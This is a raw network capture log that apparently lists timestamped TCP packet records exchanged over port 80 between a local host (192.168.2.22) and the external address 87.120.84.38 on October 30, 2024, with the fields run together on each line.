                                                                                                                                                                                  Oct 30, 2024 08:37:30.412487030 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412492037 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412503958 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412509918 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412522078 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412524939 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412543058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412544966 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412564039 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412580013 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412646055 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412662029 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412692070 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412698984 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412714958 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412715912 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412730932 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412734032 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412748098 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412755013 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412764072 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412770033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412787914 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.412806034 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414416075 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414432049 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414457083 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414465904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414472103 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414484978 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414488077 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414510012 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414511919 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414529085 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414532900 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414544106 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414555073 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414568901 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414573908 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414586067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414601088 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414611101 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414617062 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414630890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414632082 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414660931 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414680004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414695024 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414710045 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414726019 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414735079 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414741993 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414752007 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414757013 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414772034 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414773941 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414798021 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414799929 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414812088 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414813995 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414829969 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414834023 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414846897 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414849997 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414865017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414871931 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414880991 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414899111 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414901018 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414916039 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414925098 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414942026 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.414957047 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.415098906 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417021036 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417037010 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417053938 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417076111 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417083025 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417093992 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417098999 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417114019 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417120934 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417138100 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417139053 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417155027 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417156935 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417171001 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417180061 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417187929 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417196035 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417203903 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417213917 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417222977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417233944 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417253971 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417272091 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.417325020 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418741941 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418759108 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418775082 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418796062 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418813944 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418853045 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418868065 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418893099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418895006 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418910980 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418910980 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418927908 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418934107 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418942928 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418955088 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418960094 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418972015 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418976068 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418987036 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418992043 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419006109 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419008017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419025898 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419027090 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419042110 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419045925 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419064999 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419080019 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419121027 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420134068 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420198917 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420238018 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420253038 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420268059 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420284033 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420284033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420300007 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420305014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420316935 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420320988 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420340061 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420342922 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420356989 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420361042 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420372963 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420386076 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420388937 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420398951 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420407057 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420418978 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420422077 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420439005 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420439005 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420461893 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420478106 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420550108 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421828985 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421844959 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421860933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421885014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421905041 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421963930 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421988010 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422003031 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422013998 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422019005 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422034025 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422034979 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422049046 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422055960 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422064066 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422075033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422080040 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422089100 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422096014 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422108889 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422111988 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422120094 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422127008 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422146082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422167063 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422221899 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422616005 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422632933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422647953 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422672033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422672987 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422688961 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422700882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422705889 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422713041 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422724009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422730923 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422756910 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422766924 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422816992 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422832012 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422847986 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422862053 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422863960 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422875881 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422883034 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422899008 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422902107 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422914982 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422914982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422935009 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422941923 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422962904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422967911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422983885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422986984 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423001051 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423006058 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423017979 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423023939 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423033953 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423044920 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423052073 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423055887 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423070908 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423079014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423088074 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423094988 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423105955 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423113108 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423124075 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423135042 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423141956 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423156023 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423163891 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423186064 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423218966 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424192905 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424210072 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424235106 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424251080 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424251080 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424267054 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424268961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424292088 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.424308062 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581634045 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581656933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581682920 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581701040 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581727982 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581727982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581727982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581743002 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581768036 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581785917 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581801891 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581810951 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581816912 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581811905 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581811905 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581832886 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581849098 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581862926 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581865072 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581865072 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581878901 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581885099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581885099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581893921 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581909895 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581914902 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581914902 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581928968 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581933975 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581942081 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581950903 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581959963 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581969023 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581975937 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581985950 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.581994057 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582001925 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582032919 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582034111 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582078934 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582093954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582109928 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582124949 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582127094 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582143068 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582151890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582151890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582170963 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582176924 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582201958 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582204103 CET4916380192.168.2.2287.120.84.38
